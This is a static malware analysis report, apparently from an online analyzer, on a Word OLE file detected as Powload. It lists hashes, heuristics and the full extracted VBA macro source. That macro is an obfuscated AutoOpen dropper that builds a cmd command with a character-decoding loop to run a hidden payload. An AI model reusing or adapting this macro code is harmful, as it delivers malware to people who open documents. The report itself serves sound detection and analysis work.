Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4693441b08197897…

MALICIOUS

Office (OLE)

103.2 KB Created: 2018-08-09 10:14:00 Authoring application: Microsoft Office Word First seen: 2021-02-18
MD5: d0d49aae611680e760b9d0888cd58587 SHA-1: 92002e982933d7aa03170dc36162923797886e20 SHA-256: 4693441b08197897295187ba3ddef61a4a2dfd2191e76e9fb4a72d377b9b3e8a
112 Risk Score

Heuristics 6

  • ClamAV: Doc.Malware.Powload-6803987-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6803987-0
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11897 bytes
SHA-256: c640daf1e506c6425441b734511d612476c53aa855b5c456d52447d4abc9c52d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
111 of 173 identifiers look randomly generated (e.g. 'IQJwXTRPhGXIjz'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "SNMMFrcLz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName jcmNU
   TypeName CByte(792)
   TypeName 98
   TypeName 54
   TypeName Int(AwFmf + 44329)
   TypeName 956
Shell@ KeyString(vbKeyC) + hpbOtaDTutG + IQJwXTRPhGXIjz + jClDjAwt + IDnZjzbZlRA + wWNPQ + PMZEPolIY + XMldwk + awqiMtXqCpr + cskwIK + ijtPopSrF + vLzBCvfdzKVS + QAiEFKcDHu, 893070038 - 893070038
   TypeName Sin(9)
   TypeName 9706
   TypeName CInt(RlYiis)
End Sub


Attribute VB_Name = "hFUNDTC"
Function jClDjAwt()
On Error Resume Next
TypeName Sgn(34568109)
   TypeName Oct(WvzhE)
   TypeName CSng(GADMq / PTnKVF)
hcjKD = "md" + " " + "/V:" + "O/" + "C" + CStr(Chr(YTIvHEAO + irNXzvEmPKFis + 34 + cVaEijjdwSpv + XcQPNKEBUa)) + "s" + "e" + "t" + " - " + "  " + "=I"
TypeName Int(88630 - PNFWc)
   TypeName jYDfi
qBKhHPh = "dBS" + "Z" + "aVl" + "EV" + "EJw" + "pR" + "Gp" + "McX" + "USa" + "hl" + "Er"
TypeName 923
   TypeName Sqr(8)
   TypeName pmjcBZ
fZpof = "h" + "l" + "Bw" + "sz " + "7+" + "Wi" + ";mN" + "9" + "qC"
TypeName TAwmG
   TypeName 47
   TypeName Fix(wnwkP)
MwTPcZQ = ".@," + "\Pk" + "}t" + "Qb'" + "j26" + "=" + "oT)" + "fDy" + ":"
TypeName Cos(zCHfDT + sPvuR)
   TypeName CDbl(8)
   TypeName hkqWXA
wNpjUc = "/" + "nue" + "{F" + "4" + "Hv1" + "$(-"
TypeName 385
   TypeName qXbdN
   TypeName CByte(WooEZ)
EvQTXVCAbNs = "x" + "&" + "&f" + "o" + "r " + "%o" + " i" + "n " + "(" + "1" + "6,"
jClDjAwt = hcjKD + qBKhHPh + fZpof + MwTPcZQ + wNpjUc + EvQTXVCAbNs
   TypeName Sgn(22)
   TypeName Cos(11105 / Kiuuz + 34505 + YQDlwM)
   TypeName 85
End Function
Function IDnZjzbZlRA()
On Error Resume Next
TypeName 94
   TypeName Hex(59353 / oqwpb + ODXqTX - cOmVb)
   TypeName Round(604)
PzFMCz = "59," + "30" + ",69" + "," + "26" + "," + "31," + "2" + "7,6"
TypeName Sqr(44066 - AjAFb)
   TypeName Atn(sTPiO)
   TypeName CStr(46398 / qWVWR)
vfvtaYo = "9" + ",28" + ",28" + ",33" + ",7" + "6," + "53," + "37" + ",5" + "9,"
TypeName 2121
   TypeName Int(bUzTjh)
oKCGnc = "5" + "8" + "," + "67," + "69" + "," + "30," + "78," + "59" + "," + "5" + "3," + "5"
TypeName jpMpWD
   TypeName cIMII
   TypeName Sin(OzzBmK)
nucuuL = "5,6" + "9," + "1" + "8," + "51," + "33,"
TypeName 392766598
   TypeName BDwMkj
   TypeName Atn(38471 + HSEZIR + 65698 - 47989)
AqwZASd = "40," + "69," + "51" + "," + "4" + "4,3" + "6" + ",6" + "9,5" + "3," + "4"
TypeName Int(ipJPvG)
   TypeName CLng(jaoqfT)
   TypeName CDbl(fpHWZV)
wMcGGLpzN = "3," + "28," + "3" + "7," + "69,"
TypeName 185071801
   TypeName 3
sobPaTkAi = "6" + "7," + "51," + "3" + "8" + ",7" + "6," + "26" + ",67" + ",9" + ",58" + ",54"
TypeName 4638
   TypeName CDate(YZNin / nzCJTj)
urNOJkc = ",27" + "," + "5" + "1" + "," + "51" + ",1" + "6,6" + "5," + "66," + "6"
TypeName Hex(aUbiDQ)
   TypeName 9132
KuKoViEL = "6" + ",5" + "3,2" + "2,3" + "2," + "2" + "2,7" + "8" + "," + "31" + ",27"
TypeName 6
   TypeName rGQto
   TypeName Int(LbjZZ)
PzJwl = "," + "22" + ",2" + "6," + "51," + "2" + "2" + "," + "31"
TypeName CSng(9827 + 97243)
   TypeName UHGQi
DzLpJLO = ",2" + "7" + ",4" + "4," + "26" + "," + "6" + "8," + "66" + ",2" + "7," + "49"
TypeName Fix(rIkUQn * UdMQcj)
   TypeName 36033102
cQhMOijFlw = ",4" + "2," + "19," + "42," + "6" + "0," + "75," + "4" + "5" + ",2" + "7," + "5" + "1"
IDnZjzbZlRA = PzFMCz + vfvtaYo + oKCGnc + nucuuL + AqwZASd + wMcGGLpzN + sobPaTkAi + urNOJkc + KuKoViEL + PzJwl + DzLpJLO + cQhMOijFlw
   TypeName ThjpCw
   TypeName Atn(FlNvzi)
   TypeName Chr(6531)
End Function
Function wWNPQ()
On Error Resume Next
TypeName Fix(EHmAFw)
   TypeName Atn(566)
YsSVTiw = "," + "51," + "16" + ",6" + "5,6" + "6" + ",6" + "6," + "22" + ",67" + "," + "22,"
TypeName 291016583
   TypeName Log(hikYU + UoEpK)
GkdUzsVD = "16" + ",2" + "2" + "," + "1" + "6,5"
TypeName Sqr(iEGiO)
   TypeName EwRaJ
jGMOHcz = "9,2" + "8,3" + "7," + "74," + "4" + "4," + "26" + ",6" + "8," + "66" + ",21"
TypeName 53
   TypeName Log(2)
UuMSkzMsk = "," + "1" + "6," + "72" + "," + "67" + ",2" + "2," + "4"
TypeName Sin(jYKWA)
   TypeName Log(cXtLTd * dcmTwK + 85458 * GhpEiV)
   TypeName Tan(mJQaAu)
IrRTB = "5," + "2" + "7" + ",51" + ",51" + ",1" + "6,6" + "5" + ",66" + ","
TypeName 7590
   TypeName Sgn(162250344)
aLYwrmGGMBA = "66" + "," + "31," + "27" + ",59" + "," + "26,"
TypeName Sqr(cHivWl)
   TypeName 2
   TypeName EpLfco
mpRCNuJLwws = "69" + ",1" + "8" + ",26" + "," + "69," + "3" + "1," + "5" + "1,3"
TypeName rPtQKs
   TypeName 28
   TypeName Chr(206873904)
zobhCzH = "1," + "18" + "," + "27," + "59," + "59," + "2" + "8" + ",3"
TypeName CDate(28556 * puMBS)
   TypeName Round(rwMuCo)
awrFfjf = "1,4" + "4," + "18," + "59" + ",39" + ",6"
TypeName ChrB(cuafb * ariMz)
   TypeName CStr(rbtVC)
   TypeName ChrW(jftbsz * TbWYk - 85533 + 70931)
EbCzDc = "6," + "67" + ",67" + ",52" + "," + "49" + ",40" + "," + "45" + "," + "27," + "51"
wWNPQ = YsSVTiw + GkdUzsVD + jGMOHcz + UuMSkzMsk + IrRTB + aLYwrmGGMBA + mpRCNuJLwws + zobhCzH + awrFfjf + EbCzDc
   TypeName Tan(73)
   TypeName 592
   TypeName 1
End Function
Function PMZEPolIY()
On Error Resume Next
TypeName ChrW(USGZM)
   TypeName hBawR
ncTBbP = "," + "5" + "1," + "16," + "65" + ",6" + "6," + "66"
TypeName XCujm
   TypeName Chr(qkDQh * TwrHi * zIQwYk + zURfc)
PTwijQWlc = ",1" + "8,5" + "9" + ",39" + ",3"
TypeName CDbl(nuoBf)
   TypeName Rnd(bVVvaz / EiojI)
   TypeName 6
rzwLLJ = "7,1" + "8" + "," + "5" + "9," + "28" + ",69" + "," + "4" + "4,1"
TypeName WwRwB
   TypeName bAVFf
JLQjac = "8" + ",5" + "9,3" + "9,6" + "6," + "56"
TypeName CDbl(CZBhu)
   TypeName 115
   TypeName Cos(113256342)
oZjkzGFh = "," + "73," + "4,4" + "5,2" + "7" + ","
TypeName PiqtGW
   TypeName Rnd(qSCOZw)
mzoEwwfXqP = "51," + "51," + "1" + "6" + ","
TypeName uFshCf
   TypeName Chr(62639 * oKMbuo + 87467 + mqOiu)
   TypeName Oct(22)
XFHhw = "65," + "6" + "6,6" + "6,6" + "9"
TypeName CDbl(kDnAF)
   TypeName CInt(iiEfCM)
lEqzfH = ",28" + ",2" + "2," + "2" + "6,5" + "1,6"
TypeName CDbl(24269 * 45509 + KTPXOU / 20664)
   TypeName ChrB(5)
iEkKV = "9" + ",1" + "," + "6" + "9,2" + "8," + "22" + ",2" + "2," + "18" + "," + "18," + "37"
PMZEPolIY = ncTBbP + PTwijQWlc + rzwLLJ + JLQjac + oZjkzGFh + mzoEwwfXqP + XFHhw + lEqzfH + iEkKV
   TypeName AGIhq
   TypeName sijiis
End Function
Function XMldwk()
On Error Resume Next
TypeName 7004
   TypeName Sgn(LZnFV)
aMrwXivh = ",59" + "," + "6" + "7" + ",44" + ",6"
TypeName Rnd(MpTpvU)
   TypeName Oct(379)
   TypeName CInt(hzWVV)
wESofhklAMw = "9," + "3" + "1" + ",6" + "6,5" + "7,7" + "3," + "64," + "2"
TypeName wfkWLf
   TypeName 53
VNfrdawHW = "8," + "5" + "4," + "4" + "4,2"
TypeName 113758053
   TypeName CByte(8)
riwJDm = "1" + ",16" + ",2" + "8," + "3" + "7"
TypeName Fix(18)
   TypeName dqiCuh
HSpQCaWh = ",5" + "1," + "77" + ",5" + "4," + "45," + "5" + "4,"
TypeName 536
   TypeName JGVilr
zOCUPp = "61," + "38," + "76," + "68" + ",42" + ",43" + ",3"
XMldwk = aMrwXivh + wESofhklAMw + VNfrdawHW + riwJDm + HSpQCaWh + zOCUPp
   TypeName 2714
   TypeName CDbl(50665 * hStuZ + 1889 / 19042)
   TypeName Chr(22274 - ijDHoS)
End Function
Function awqiMtXqCpr()
On Error Resume Next
TypeName ChrW(359698930)
   TypeName Hex(3355)
   TypeName CStr(9145)
MOvqbaAa = "3,5" + "8,3" + "3" + "," + "5" + "4,"
TypeName CBool(967)
   TypeName Oct(7586)
   TypeName Cos(dBhtP)
lLdjctOs = "75" + "," + "34," + "41" + "," + "54," + "3" + "8" + ","
TypeName YoHUjf
   TypeName Rnd(8)
ZGwtMXhpI = "76," + "68" + ",31" + ",5" + "1" + ",58" + ",7" + "6,6" + "9,6" + "7" + ",7" + "4,6"
TypeName 6550
   TypeName 724
BnZZNTZ = "5,5" + "1" + ",69" + ",39" + ",16" + ",3" + "5," + "54"
TypeName fEHsHj
   TypeName Tan(dDXcDk - 13969 - 72516 * YQYTQ)
   TypeName Sgn(47)
kHLNWMwt = ",47" + ",5" + "4," + "35," + "76," + "68," + "4" + "2,4"
TypeName hKQQqw
   TypeName Atn(3050 * HPMlD)
   TypeName uKhti
iooti = "3" + ",3" + "5,5" + "4" + "," + "44," + "6" + "9"
awqiMtXqCpr = MOvqbaAa + lLdjctOs + ZGwtMXhpI + BnZZNTZ + kHLNWMwt + iooti
   TypeName LVJaa
   TypeName wIUwT
   TypeName 903
End Function
Function cskwIK()
On Error Resume Next
TypeName 4579
   TypeName LMAkv
   TypeName 428125894
TBYUA = ",7" + "9" + ",6" + "9," + "5" + "4" + ",3" + "8" + ",6"
TypeName Chr(SiUKjv)
   TypeName 28
phzBUrP = "2," + "59," + "2" + "6,6" + "9,2" + "2," + "18"
TypeName CBool(jPnVI)
   TypeName CBool(85)
XzkjiFw = ",27" + ",77" + "," + "76" + ","
TypeName Fix(2165 - 27933 - ZTtzlW + UrLdfJ)
   TypeName HSsBb
   TypeName Hex(8)
bwVliJfss = "67," + "25," + "1" + "4," + "33," + "37," + "6" + "7," + "33" + ",7"
TypeName CDbl(2)
   TypeName Round(wYicVv)
   TypeName 586
rSEBOb = "6" + "," + "26" + "," + "67" + ",9," + "61," + "70"
TypeName CLng(66601 - BjzzF + 72932 / ocjCDY)
   TypeName Rnd(ahtafj / zSGhiR)
   TypeName 4
GYYEtSnWT = ",51" + ",26" + ",6" + "4," + "7" + "0" + "," + "76," + "5"
TypeName sBnzlz
   TypeName Oct(981)
RusLNXKLW = "3" + ",3" + "7," + "59" + ",44" + ",6" + "3" + ",5" + "9,"
TypeName CDate(idGhVv / mCziu - wswYsA - kDiaak)
   TypeName CBool(84)
   TypeName Sqr(ASHkp)
IHRbdq = "30" + ",67" + "," + "28" + "," + "59"
TypeName Sin(42149 / wNQza)
   TypeName Kfrzzv
wVXzhlqsVZ = "," + "2" + "2,1" + ",71" + "," + "37" + "," + "28"
TypeName CInt(aLHVir)
   TypeName CSng(2)
aYLpADNhK = ",69" + "," + "7" + "7," + "76" + ",6" + "7," + "2" + "5" + "," + "14" + "," + "4"
TypeName CBool(ujHkSH + hwVdw)
   TypeName CLng(63145 / NMJok)
vmALsd = "6" + "," + "3" + "3," + "76" + ",6" + "8,3" + "1," + "5" + "1," + "61" + ",38" + ",21"
TypeName Tan(7790)
   TypeName Fix(71390 + 94297 - RkAmG + OHvQv)
   TypeName Chr(YpjNCT)
SYUOjmTTAjT = "," + "5" + "1" + ",2" + "2,"
cskwIK = TBYUA + phzBUrP + XzkjiFw + bwVliJfss + rSEBOb + GYYEtSnWT + RusLNXKLW + IHRbdq + wVXzhlqsVZ + aYLpADNhK + vmALsd + SYUOjmTTAjT
   TypeName AUffOF
   TypeName vKZBX
End Function
Function ijtPopSrF()
On Error Resume Next
TypeName Round(zPoaPa)
   TypeName Log(1585)
mwqjdvwQhI = "26" + "," + "51," + "78" + "," + "48" + "," + "26" + ",59"
TypeName 471
   TypeName CInt(2017)
URuNJNnh = "," + "1" + "8," + "69," + "31," + "3" + "1," + "33," + "76," + "68" + "," + "31," + "5"
TypeName Round(1)
   TypeName RzjbJA
   TypeName sACZDz
vEnjZ = "1" + ",38" + ",53" + ",26" + ",6" + "9,2" + "2,4"
TypeName dMtaNP
   TypeName ChrB(34857 - RLWjp + KZKNv + 29292)
   TypeName Sgn(1)
Ddtnd = "9," + "38" + "," + "50," + "18," + "22," + "51," + "1" + "8," + "27," + "70" + ","
TypeName Int(jhiSv)
   TypeName Hex(PlAMa)
   TypeName CLng(2)
XNzXuYNVAz = "50," + "50" + ",3" + "3," + "33" + ",3" + "3,3" + "3," + "3" + "3," + "3"
TypeName WjcwE
   TypeName Oct(waGOz + 70785)
   TypeName 35
dDVtik = "3,3" + "3" + ",3" + "3," + "33," + "33," + "33," + "3" + "3" + ",3" + "3," + "33"
TypeName Sin(COOoYB)
   TypeName 744
   TypeName Hex(UDPww + ShiWwQ)
rqdznz = ",33" + "," + "33," + "3" + "3,8" + "8)" + "do" + " s" + "e"
TypeName BtEjTQ
   TypeName rWdtnw
alZPTTi = "t ]" + "   " + "=!]" + "  " + " !!" + "- " + " " + " :" + "~%o"
TypeName Sin(820)
   TypeName ChrB(5)
   TypeName 963
SibwAoaZXu = ",1" + "!&&" + "if " + "%o" + "=" + "=88" + " "
TypeName Fix(31076 * uKpQN)
   TypeName Tan(53951 + Cniai)
fLWGuukQuXh = "ca" + "l" + "l" + " %]" + "  " + " :" + "~-3" + "60" + "%" + CStr(Chr(lzVCpazMfj + PKwOQFHA + 34 + rioTfziaB + LulIucPwj)) + " " + "   "
ijtPopSrF = mwqjdvwQhI + URuNJNnh + vEnjZ + Ddtnd + XNzXuYNVAz + dDVtik + rqdznz + alZPTTi + SibwAoaZXu + fLWGuukQuXh
   TypeName RGtEuF
   TypeName CLng(7)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.